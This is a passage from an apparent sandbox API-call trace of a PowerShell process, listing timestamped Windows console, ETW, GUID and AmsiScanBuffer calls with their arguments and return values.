lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.613] GetConsoleOutputCP () returned 0x1b5 [0306.613] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.613] GetConsoleOutputCP () returned 0x1b5 [0306.613] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.613] GetConsoleOutputCP () returned 0x1b5 [0306.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.614] GetConsoleOutputCP () returned 0x1b5 [0306.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.615] GetConsoleOutputCP () returned 0x1b5 [0306.615] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.615] GetConsoleOutputCP () returned 0x1b5 [0306.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.616] GetConsoleOutputCP () returned 0x1b5 [0306.616] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.616] GetConsoleOutputCP () returned 0x1b5 [0306.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.617] GetConsoleOutputCP () returned 0x1b5 [0306.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.617] GetConsoleOutputCP () returned 0x1b5 [0306.617] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.617] GetConsoleOutputCP () returned 0x1b5 [0306.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.618] GetConsoleOutputCP () returned 0x1b5 [0306.618] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.618] GetConsoleOutputCP () returned 0x1b5 [0306.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.619] GetConsoleOutputCP () returned 0x1b5 [0306.619] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.619] GetConsoleOutputCP () returned 0x1b5 [0306.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.620] GetConsoleOutputCP () returned 0x1b5 [0306.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.620] GetConsoleOutputCP () returned 0x1b5 [0306.620] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.620] GetConsoleOutputCP () returned 0x1b5 [0306.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.621] GetConsoleOutputCP () returned 0x1b5 [0306.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.621] GetConsoleOutputCP () returned 0x1b5 [0306.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.622] GetConsoleOutputCP () returned 0x1b5 [0306.622] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.622] GetConsoleOutputCP () returned 0x1b5 [0306.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.623] GetConsoleOutputCP () returned 0x1b5 [0306.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.623] GetConsoleOutputCP () returned 0x1b5 [0306.623] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.623] GetConsoleOutputCP () returned 0x1b5 [0306.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.624] GetConsoleOutputCP () returned 0x1b5 [0306.624] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.624] GetConsoleOutputCP () returned 0x1b5 [0306.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.625] GetConsoleOutputCP () returned 0x1b5 [0306.625] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.625] GetConsoleOutputCP () returned 0x1b5 [0306.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.626] GetConsoleOutputCP () returned 0x1b5 [0306.626] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.626] GetConsoleOutputCP () returned 0x1b5 [0306.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83df88 | out: lpConsoleScreenBufferInfo=0x1b83df88) returned 1 [0306.722] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83df28 | out: lpConsoleScreenBufferInfo=0x1b83df28) returned 1 [0306.736] GetConsoleOutputCP () returned 0x1b5 [0306.738] CoTaskMemAlloc (cb=0x960) returned 0x1a83d890 [0306.738] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a83d890, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83de20 | out: lpBuffer=0x1a83d890, lpReadRegion=0x1b83de20) returned 1 [0306.744] CoTaskMemFree (pv=0x1a83d890) [0306.744] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dd48 | out: lpConsoleScreenBufferInfo=0x1b83dd48) returned 1 [0306.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83df88 | out: lpConsoleScreenBufferInfo=0x1b83df88) returned 1 [0306.746] GetConsoleOutputCP () returned 0x1b5 [0306.747] CoTaskMemAlloc (cb=0x960) returned 0x1a83d890 [0306.747] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a83d890, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83de10 | out: lpWriteRegion=0x1b83de10) returned 1 [0306.748] CoTaskMemFree (pv=0x1a83d890) [0306.913] EtwEventActivityIdControl () returned 0x0 [0306.913] EtwEventActivityIdControl () returned 0x0 [0306.914] EtwEventActivityIdControl () returned 0x0 [0306.925] EtwEventActivityIdControl () returned 0x0 [0306.925] EtwEventActivityIdControl () returned 0x0 [0306.925] EtwEventActivityIdControl () returned 0x0 [0306.941] CoCreateGuid (in: pguid=0x1b83d858 | out: pguid=0x1b83d858*(Data1=0x31007a3c, Data2=0x9259, Data3=0x454f, Data4=([0]=0x89, [1]=0x83, [2]=0xf1, [3]=0x65, [4]=0x8e, [5]=0x51, [6]=0xb3, [7]=0xcc))) returned 0x0 [0306.957] AmsiScanBuffer () returned 0x80070015 [0308.413] CoCreateGuid (in: pguid=0x1b83d858 | out: pguid=0x1b83d858*(Data1=0x22ac6b0b, Data2=0x8022, Data3=0x49d4, Data4=([0]=0xba, [1]=0xc4, [2]=0x8f, [3]=0x2d, [4]=0xe0, [5]=0x80, [6]=0xf1, [7]=0xd1))) returned 0x0 [0308.423] AmsiScanBuffer () returned 0x80070015 [0309.136] CoCreateGuid (in: pguid=0x1b83cf68 | out: pguid=0x1b83cf68*(Data1=0xcea11fb4, Data2=0xba29, Data3=0x48c7, Data4=([0]=0xac, [1]=0xa7, [2]=0x89, [3]=0xa9, [4]=0x41, [5]=0x93, [6]=0x18, [7]=0x7f))) returned 0x0 [0309.136] AmsiScanBuffer () returned 0x80070015 [0309.138] EtwEventActivityIdControl () returned 0x0 [0309.138] EtwEventActivityIdControl () returned 0x0 [0309.138] EtwEventActivityIdControl () returned 0x0 [0309.138] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0309.139] EtwEventActivityIdControl () returned 0x0 [0309.139] EtwEventActivityIdControl () returned 0x0 [0309.139] EtwEventActivityIdControl () returned 0x0 [0309.140] EtwEventActivityIdControl () returned 0x0 [0309.308] AmsiScanBuffer () returned 0x80070015 [0309.309] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x87c [0309.309] CoCreateGuid (in: pguid=0x1b83c138 | out: pguid=0x1b83c138*(Data1=0x5e23402c, Data2=0x952, Data3=0x4752, Data4=([0]=0xa5, [1]=0xfa, [2]=0x5b, [3]=0xa1, [4]=0x5d, [5]=0xfb, [6]=0x42, [7]=0xf2))) returned 0x0 [0309.309] AmsiScanBuffer () returned 0x80070015 [0309.312] EtwEventActivityIdControl () returned 0x0 [0309.312] EtwEventActivityIdControl () returned 0x0 [0309.312] EtwEventActivityIdControl () returned 0x0 [0309.313] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83b580, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0309.313] EtwEventActivityIdControl () returned 0x0 [0309.313] EtwEventActivityIdControl () returned 0x0 [0309.313] EtwEventActivityIdControl () returned 0x0 [0309.313] EtwEventActivityIdControl () returned 0x0 [0309.642] EtwEventActivityIdControl () returned 0x0 [0309.642] EtwEventActivityIdControl () returned 0x0 [0309.642] EtwEventActivityIdControl () returned 0x0 [0309.642] EtwEventActivityIdControl () returned 0x0 [0310.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83cf28 | out: lpConsoleScreenBufferInfo=0x1b83cf28) returned 1 [0310.649] CoCreateGuid (in: pguid=0x1b83cf68 | out: pguid=0x1b83cf68*(Data1=0x6ba36cb1, Data2=0xff4f, Data3=0x421a, Data4=([0]=0xb2, [1]=0x89, [2]=0xd0, [3]=0xdf, [4]=0x9b, [5]=0x5e, [6]=0xb8, [7]=0x33))) returned 0x0 [0310.649] AmsiScanBuffer () returned 0x80070015 [0310.650] EtwEventActivityIdControl () returned 0x0 [0310.650] EtwEventActivityIdControl () returned 0x0 [0310.650] EtwEventActivityIdControl () returned 0x0 [0310.650] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0310.651] EtwEventActivityIdControl () returned 0x0 [0310.651] EtwEventActivityIdControl () returned 0x0 [0310.651] EtwEventActivityIdControl () returned 0x0 [0310.651] EtwEventActivityIdControl () returned 0x0 [0310.728] EtwEventActivityIdControl () returned 0x0 [0310.728] EtwEventActivityIdControl () returned 0x0 [0311.400] CoCreateGuid (in: pguid=0x1b83cf68 | out: pguid=0x1b83cf68*(Data1=0xd508fae6, Data2=0xe1d, Data3=0x4193, Data4=([0]=0x8c, [1]=0x8e, [2]=0x8, [3]=0x5d, [4]=0x37, [5]=0xcf, [6]=0x10, [7]=0xc8))) returned 0x0 [0311.401] AmsiScanBuffer () returned 0x80070015 [0311.402] EtwEventActivityIdControl () returned 0x0 [0311.402] EtwEventActivityIdControl () returned 0x0 [0311.402] EtwEventActivityIdControl () returned 0x0 [0311.402] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0311.403] EtwEventActivityIdControl () returned 0x0 [0311.403] EtwEventActivityIdControl () returned 0x0 [0311.403] EtwEventActivityIdControl () returned 0x0 [0311.403] EtwEventActivityIdControl () returned 0x0 [0311.618] EtwEventActivityIdControl () returned 0x0 [0311.618] EtwEventActivityIdControl () returned 0x0 [0311.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83db98 | out: lpConsoleScreenBufferInfo=0x1b83db98) returned 1 [0312.031] GetConsoleOutputCP () returned 0x1b5 [0312.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.039] GetConsoleOutputCP () returned 0x1b5 [0312.040] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.040] GetConsoleOutputCP () returned 0x1b5 [0312.043] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.043] GetConsoleOutputCP () returned 0x1b5 [0312.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.057] GetConsoleOutputCP () returned 0x1b5 [0312.057] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.057] GetConsoleOutputCP () returned 0x1b5 [0312.058] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.058] GetConsoleOutputCP () returned 0x1b5 [0312.058] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.059] GetConsoleOutputCP () returned 0x1b5 [0312.059] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.059] GetConsoleOutputCP () returned 0x1b5 [0312.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.060] GetConsoleOutputCP () returned 0x1b5 [0312.060] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.060] GetConsoleOutputCP () returned 0x1b5 [0312.061] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.061] GetConsoleOutputCP () returned 0x1b5 [0312.062] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.062] GetConsoleOutputCP () returned 0x1b5 [0312.063] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.063] GetConsoleOutputCP () returned 0x1b5 [0312.064] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.064] GetConsoleOutputCP () returned 0x1b5 [0312.064] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.064] GetConsoleOutputCP () returned 0x1b5 [0312.065] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.065] GetConsoleOutputCP () returned 0x1b5 [0312.065] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.065] GetConsoleOutputCP () returned 0x1b5 [0312.066] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.066] GetConsoleOutputCP () returned 0x1b5 [0312.066] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.066] GetConsoleOutputCP () returned 0x1b5 [0312.067] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.067] GetConsoleOutputCP () returned 0x1b5 [0312.067] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.067] GetConsoleOutputCP () returned 0x1b5 [0312.068] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.068] GetConsoleOutputCP () returned 0x1b5 [0312.068] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.068] GetConsoleOutputCP () returned 0x1b5 [0312.068] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.069] GetConsoleOutputCP () returned 0x1b5 [0312.069] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.069] GetConsoleOutputCP () returned 0x1b5 [0312.069] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.069] GetConsoleOutputCP () returned 0x1b5 [0312.070] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.070] GetConsoleOutputCP () returned 0x1b5 [0312.070] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.070] GetConsoleOutputCP () returned 0x1b5 [0312.070] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.071] GetConsoleOutputCP () returned 0x1b5 [0312.071] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.071] GetConsoleOutputCP () returned 0x1b5 [0312.071] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.071] GetConsoleOutputCP () returned 0x1b5 [0312.072] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.072] GetConsoleOutputCP () returned 0x1b5 [0312.072] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.072] GetConsoleOutputCP () returned 0x1b5 [0312.072] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.072] GetConsoleOutputCP () returned 0x1b5 [0312.073] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.073] GetConsoleOutputCP () returned 0x1b5 [0312.073] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.073] GetConsoleOutputCP () returned 0x1b5 [0312.074] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.074] GetConsoleOutputCP () returned 0x1b5 [0312.074] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.074] GetConsoleOutputCP () returned 0x1b5 [0312.074] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.075] GetConsoleOutputCP () returned 0x1b5 [0312.075] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.075] GetConsoleOutputCP () returned 0x1b5 [0312.075] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.075] GetConsoleOutputCP () returned 0x1b5 [0312.076] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.076] GetConsoleOutputCP () returned 0x1b5 [0312.076] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.076] GetConsoleOutputCP () returned 0x1b5 [0312.077] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83d9e8) returned 0 [0312.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83dad8 | out: lpConsoleScreenBufferInfo=0x1b83dad8) returned 1 [0312.078] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da38 | out: lpConsoleScreenBufferInfo=0x1b83da38) returned 1 [0312.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.080] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0312.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da48 | out: lpConsoleScreenBufferInfo=0x1b83da48) returned 1 [0312.081] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0312.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83c730, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0312.082] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83da70 | out: lpMode=0x1b83da70) returned 1 [0312.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9c8 | out: lpConsoleScreenBufferInfo=0x1b83d9c8) returned 1 [0312.083] GetConsoleOutputCP () returned 0x1b5 [0312.083] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.083] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d850 | out: lpWriteRegion=0x1b83d850) returned 1 [0312.084] CoTaskMemFree (pv=0x1ad7bc60) [0312.085] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x2948a84*, nNumberOfCharsToWrite=0x6b, lpNumberOfCharsWritten=0x1b83da58, lpReserved=0x0 | out: lpBuffer=0x2948a84*, lpNumberOfCharsWritten=0x1b83da58*=0x6b) returned 1 [0312.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d918 | out: lpConsoleScreenBufferInfo=0x1b83d918) returned 1 [0312.086] GetConsoleOutputCP () returned 0x1b5 [0312.087] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.087] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b83d810 | out: lpBuffer=0x1ad7bc60, lpReadRegion=0x1b83d810) returned 1 [0312.087] CoTaskMemFree (pv=0x1ad7bc60) [0312.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d738 | out: lpConsoleScreenBufferInfo=0x1b83d738) returned 1 [0312.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d978 | out: lpConsoleScreenBufferInfo=0x1b83d978) returned 1 [0312.088] GetConsoleOutputCP () returned 0x1b5 [0312.089] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.089] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d800 | out: lpWriteRegion=0x1b83d800) returned 1 [0312.089] CoTaskMemFree (pv=0x1ad7bc60) [0312.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.090] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0312.090] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83d9f8 | out: lpConsoleScreenBufferInfo=0x1b83d9f8) returned 1 [0312.090] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0312.091] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b83db10 | out: lpMode=0x1b83db10) returned 1 [0312.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83da68 | out: lpConsoleScreenBufferInfo=0x1b83da68) returned 1 [0312.091] GetConsoleOutputCP () returned 0x1b5 [0312.092] CoTaskMemAlloc (cb=0x960) returned 0x1ad7bc60 [0312.092] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1ad7bc60, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b83d8f0 | out: 